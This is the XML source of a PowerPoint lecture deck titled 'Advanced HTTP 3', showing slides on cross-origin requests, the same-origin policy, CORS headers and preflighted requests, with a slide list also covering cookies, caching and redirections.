        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2679154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access control (CORS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1219200"/>
            <a:ext cx="9144000" cy="3352800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>A resource makes a cross-origin HTTP request when it requests a resource from a different domain than the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>original one. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>example, an HTML page served from http://domain-a.com makes an &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> request for http://domain-b.com/image.jpg. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Many </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>pages on the web today load resources like CSS stylesheets, images and scripts from separate domains.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1553474" y="3200400"/>
            <a:ext cx="5190226" cy="3619500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3202584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access control (CORS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1219200"/>
            <a:ext cx="9144000" cy="5638800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>For security reasons, browsers restrict cross-origin HTTP requests </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>initiated from within </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>example, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>follow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>the same-origin policy. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> object can only </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>make HTTP requests to its own domain. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>improve web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>applications functionality, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>developers asked browser vendors to allow cross-domain requests from within </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The Cross-Origin Resource Sharing (CORS) mechanism gives web servers cross-domain access controls, which enable secure cross-domain data transfers. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Modern </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>browsers use CORS in an API container - such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>XMLHttpRequest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>to mitigate risks of cross-origin HTTP requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>The Cross-Origin Resource Sharing standard works by adding new HTTP headers that allow servers to describe the set of origins that are permitted to read that information using a web browser. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Additionally, for HTTP request methods that can cause side-effects on server's data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(PUT, POST, DELETE,…), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>the specification mandates that browsers "preflight" the request, soliciting supported methods from the server with an HTTP OPTIONS request method, and then, upon "approval" from the server, sending the actual request with the actual HTTP request method. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Servers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>can also notify clients whether "credentials" (including Cookies and HTTP Authentication data) should be sent with requests.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2906990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access control scenarios</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Simple requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1219200"/>
            <a:ext cx="9144000" cy="1600200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>Suppose a web application on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>foo.example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t>wishes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>to invoke content on domain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>bar.other</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" smtClean="0">
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>from a JS script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Let us look at what the browser will send the server in this case, and let's see how the server responds</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1409700" y="2409825"/>
            <a:ext cx="6324600" cy="4448175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4248512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access control scenarios</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Preflighted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="3200400" cy="5486400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unlike “simple requests” (discussed above), "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>preflighted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>" requests first send an HTTP request by the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>OPTIONS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> method to the resource on the other domain, in order to determine whether the actual request is safe to send. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>requests are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>preflighted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> like this since they may have implications to user data. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4038600" y="1349375"/>
            <a:ext cx="4924425" cy="5343525"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1426110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access control scenarios</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Preflighted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> requests</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1219200"/>
            <a:ext cx="3200400" cy="5486400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Once the preflight request is complete, the real request is sent:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="1219" r="20000" b="1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4495800" y="685800"/>
            <a:ext cx="4648200" cy="6172200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7049140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5787</TotalTime>
  <Words>3417</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>238</Paragraphs>
  <Slides>25</Slides>
  <Notes>9</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Clarity</vt:lpstr>
      <vt:lpstr>Advanced HTTP 3 </vt:lpstr>
      <vt:lpstr>HTTP cookies</vt:lpstr>
      <vt:lpstr>Creating cookies</vt:lpstr>
      <vt:lpstr>Cookie theory</vt:lpstr>
      <vt:lpstr>HTTP access control (CORS)</vt:lpstr>
      <vt:lpstr>HTTP access control (CORS)</vt:lpstr>
      <vt:lpstr>Examples of access control scenarios Simple requests</vt:lpstr>
      <vt:lpstr>Examples of access control scenarios Preflighted requests</vt:lpstr>
      <vt:lpstr>Examples of access control scenarios Preflighted requests</vt:lpstr>
      <vt:lpstr>Examples of access control scenarios Requests with credentials</vt:lpstr>
      <vt:lpstr>The HTTP request headers</vt:lpstr>
      <vt:lpstr>The HTTP response headers</vt:lpstr>
      <vt:lpstr>HTTP caching</vt:lpstr>
      <vt:lpstr>Caches types</vt:lpstr>
      <vt:lpstr>Targets of caching operations</vt:lpstr>
      <vt:lpstr>Controlling caching</vt:lpstr>
      <vt:lpstr>Freshness</vt:lpstr>
      <vt:lpstr>Revved resources</vt:lpstr>
      <vt:lpstr>ETags</vt:lpstr>
      <vt:lpstr>Varying responses</vt:lpstr>
      <vt:lpstr>Varying responses</vt:lpstr>
      <vt:lpstr>Redirections in HTTP</vt:lpstr>
      <vt:lpstr>Redirection types</vt:lpstr>
      <vt:lpstr>Alternative way of specifying redirections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Patricia</dc:creator>
  <cp:lastModifiedBy>Default-User</cp:lastModifiedBy>
  <cp:revision>453</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-04-10T05:25:39Z</dcterms:modified>
</cp:coreProperties>
</file>